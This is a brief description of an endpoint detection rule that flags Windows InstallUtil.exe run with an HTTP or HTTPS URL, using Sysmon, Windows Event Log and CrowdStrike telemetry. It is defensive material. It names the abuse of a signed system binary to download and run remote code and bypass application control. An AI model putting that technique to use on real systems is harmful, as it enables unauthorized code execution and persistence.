The detection rule "Windows InstallUtil URL in Command Line" captures instances where the Windows InstallUtil.exe is executed with an HTTP or HTTPS URL in the command line arguments. This analytic leverages Endpoint Detection and Response (EDR) telemetry and is designed to detect potentially malicious activity that may involve downloading and executing remote code. Such actions may aim to bypass application control and could lead to unauthorized code execution, privilege escalation, or persistent access tied to compromised systems. It utilizes data from Sysmon, Windows Event Logs, and CrowdStrike telemetry to efficiently track command-line invocations of InstallUtil with embedded URLs. Analysts are encouraged to correlate findings with additional data sources including parent reference processes and network activity for deeper contextual investigation.